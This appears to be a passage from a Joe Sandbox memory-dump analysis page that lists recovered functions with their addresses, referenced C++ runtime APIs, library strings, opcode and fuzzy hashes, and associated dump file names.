API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: 0:0$bad locale name
API String ID: 1840309910-4031232150
Opcode ID: 3ed93b0c7dadf349c162b28d7d278cae72c48285407013bdaee82e33c4bca680
Instruction ID: 01eb59dafb34fb1ff82779f4316e4150010fd20131b441804df82b701eb642db
Opcode Fuzzy Hash: 3ed93b0c7dadf349c162b28d7d278cae72c48285407013bdaee82e33c4bca680
Instruction Fuzzy Hash: F35170B2D01358DBDB11DFA5D84579EFBB8AF14310F14816AE804AB381E775EA08CB92

Function 003E04D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 003E0507
___except_validate_context_record.LIBVCRUNTIME ref: 003E050F
_ValidateLocalCookies.LIBCMT ref: 003E0598
__IsNonwritableInCurrentImage.LIBCMT ref: 003E05C3
_ValidateLocalCookies.LIBCMT ref: 003E0618

Strings

csm, xrefs: 003E05AD

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5910cc291f1e387528c1d5666bc3310f1321a06470a928661a459e973e038450
Instruction ID: 10bd7e8b6b971bce6a7c6884c50d8b9da0b04311c2ac9e009dd9132f32610af8
Opcode Fuzzy Hash: 5910cc291f1e387528c1d5666bc3310f1321a06470a928661a459e973e038450
Instruction Fuzzy Hash: 4041F930A042689FCF15DF6AC880A9E7BB4EF45324F148265E814AB3D2D775EA45CF90

Function 00369240 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00369263
std::_Lockit::_Lockit.LIBCPMT ref: 00369286
std::_Lockit::~_Lockit.LIBCPMT ref: 003692A6
std::_Facet_Register.LIBCPMT ref: 0036931B
std::_Lockit::~_Lockit.LIBCPMT ref: 00369333
Concurrency::cancel_current_task.LIBCPMT ref: 0036934B

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: c657c4c8d75a3c9c12d4d6fdfd8ec5bb1c2df41150b0f73586544476ee4e7b88
Instruction ID: ce1bbed4086bdb84c1689671a2ab429c6f1faae71d7c491f2153452dd4c730c1
Opcode Fuzzy Hash: c657c4c8d75a3c9c12d4d6fdfd8ec5bb1c2df41150b0f73586544476ee4e7b88
Instruction Fuzzy Hash: 06419F72D00219EFCB12DF54E841BAABBB8FB45720F15866AE805AB395D730AD05CBD1

Function 00305DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 003060F2
___std_exception_destroy.LIBVCRUNTIME ref: 0030617F
___std_exception_copy.LIBVCRUNTIME ref: 00306248

Strings

recursive_directory_iterator::operator++, xrefs: 003061CC

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: ec9d104150e99aa0e5696c67647cf6c673e6443fde7a55fdaf8a3d6edba02f18
Instruction ID: df072d40c7f1576c86225e5aaa5301835358dfd088cb5909c9d26423467974f5
Opcode Fuzzy Hash: ec9d104150e99aa0e5696c67647cf6c673e6443fde7a55fdaf8a3d6edba02f18
Instruction Fuzzy Hash: 1EE133B19106049FDB2ADF68D855BAEB7F9FF44300F10862EE44297781E774AA44CBA0

Function 003084C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 003086DE
___std_exception_destroy.LIBVCRUNTIME ref: 003086ED

Strings

, column , xrefs: 00308555, 0030856B
at line , xrefs: 00308518

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: ddc185257668d7934acd1dd77c44026b70c6047ff250515d0f18260c1f723bbe
Instruction ID: b97806acc45bb8f9c38d3217fb3f8b91183af05f3695769a54b13205c33c74af
Opcode Fuzzy Hash: ddc185257668d7934acd1dd77c44026b70c6047ff250515d0f18260c1f723bbe
Instruction Fuzzy Hash: 1B618871E102089FDB0ACF68DC95B9EBBB5FF45310F148619E451AB7C2EB74AA80C794

Function 00373150 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00374109
___std_exception_destroy.LIBVCRUNTIME ref: 00374122

Strings

value, xrefs: 0037402F

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 045a8daa0984c5d62df53d4704e5423a5cb384533651d61441a51bd2b9bdbec5
Instruction ID: c0db098467623bca59eca7c8ee1362f6bae71f043de259ca8ba3a90901e0d558
Opcode Fuzzy Hash: 045a8daa0984c5d62df53d4704e5423a5cb384533651d61441a51bd2b9bdbec5
Instruction Fuzzy Hash: 8151D3B1C00258DFDF25DFA4DC85BDEBBB5AF05304F148259E449AB382D7786A88CB61

Function 00303B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00303C0F

Strings

ios_base::eofbit set, xrefs: 00303BB6
ios_base::badbit set, xrefs: 00303BA7, 00303BD2, 00303BF3
ios_base::failbit set, xrefs: 00303AC8, 00303BB1

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: c9d6b1ff241e5fd832478be8655ed88bbb31281d949e4ef5c290a9bce0338137
Instruction ID: 30097b6c47e032f552a6757f4ed9b6bbe32c32376421c3ee7c513e6880c1552d
Opcode Fuzzy Hash: c9d6b1ff241e5fd832478be8655ed88bbb31281d949e4ef5c290a9bce0338137
Instruction Fuzzy Hash: 1C11D2B2900708ABC711DF58E801B96B7DCAF05310F14C62BF9589B681F774EA54CB95

Function 003726F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 00372BD3

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 1225f2861d56ee1c0f9ddf293a9480c2585ea23aa4553cfe4ff6ddb6643cac3b
Instruction ID: 459f5dc0926a4299ce4782244a28dadec5d6aa43b27313f4ef72616c065bfb1b
Opcode Fuzzy Hash: 1225f2861d56ee1c0f9ddf293a9480c2585ea23aa4553cfe4ff6ddb6643cac3b
Instruction Fuzzy Hash: ADE1E371A002059FCB29DF28C891A6EB7A5FF49310F15C36AE819EB391E734ED51CB90

Function 00308080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0030844D

Strings

parse error, xrefs: 00308149, 00308162
ror, xrefs: 003080D4

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 069a050bcc951d00ed4a1761ffc5c10738d8aa00f15df624154de0dfed608241
Instruction ID: 712217994404f9eea094b8e87e7a578fba5438939b80879ef9de603abb5c1792
Opcode Fuzzy Hash: 069a050bcc951d00ed4a1761ffc5c10738d8aa00f15df624154de0dfed608241
Instruction Fuzzy Hash: 9FC11331D10659CFEB0ACF68CC95BADBB71BF45304F148259E044AB6D2DB74AA85CB90

Function 00307DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00308051
___std_exception_destroy.LIBVCRUNTIME ref: 00308060

Strings

[json.exception., xrefs: 00307E1C

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 70474413f1296d8f9fcffc4a5ab505b444ea9b6614a806f8b1e960b359b7d4f2
Instruction ID: 7827a7386969a2c6792d8b85567b88e87984226c76e62627ed2b2d9be5051957
Opcode Fuzzy Hash: 70474413f1296d8f9fcffc4a5ab505b444ea9b6614a806f8b1e960b359b7d4f2
Instruction Fuzzy Hash: 17912631D112089FDB1ACFA8CC95BAEFBB5FF45314F148259E400AB6D2DBB4A984C790

Function 00303A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00303C0F

Strings

ios_base::badbit set, xrefs: 00303BA7, 00303BD2, 00303BF3
ios_base::failbit set, xrefs: 00303AC8

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: ad6c25f52ef5f5e2c22e3448e1382998228ff2b689e1f9f97f714e59d0a76fe0
Instruction ID: 25b6af1d6b1ef03a353d3a9ca2296ef8d6a49f7e277e92037b8abede0b981f2a
Opcode Fuzzy Hash: ad6c25f52ef5f5e2c22e3448e1382998228ff2b689e1f9f97f714e59d0a76fe0
Instruction Fuzzy Hash: F641F672910604ABCB05DF58DC85BAAFBB9EF45310F14822AF9149B6C1E774AA40CB95

Function 00374250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00374AB9
___std_exception_destroy.LIBVCRUNTIME ref: 00374AD2
___std_exception_destroy.LIBVCRUNTIME ref: 003755DD
___std_exception_destroy.LIBVCRUNTIME ref: 003755F6

Strings

value, xrefs: 00375503

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 98c7715dbd71f1d2103ad5e92e5fb3c10387da3ca951bb80336ce2adb6d93992
Instruction ID: a1eaed9266ab5c57f2e6cb6dd5f913d821faac2ffaefeed54e1e006097d704a5
Opcode Fuzzy Hash: 98c7715dbd71f1d2103ad5e92e5fb3c10387da3ca951bb80336ce2adb6d93992
Instruction Fuzzy Hash: 2D51E3B1C00258DFDF26DFA4CC85BDEBBB4AF05304F148259E449AB382D7786688CB51

Function 00379630 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00379681

Strings

type must be boolean, but is , xrefs: 00379772
type must be string, but is , xrefs: 003796E8

Memory Dump Source

Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
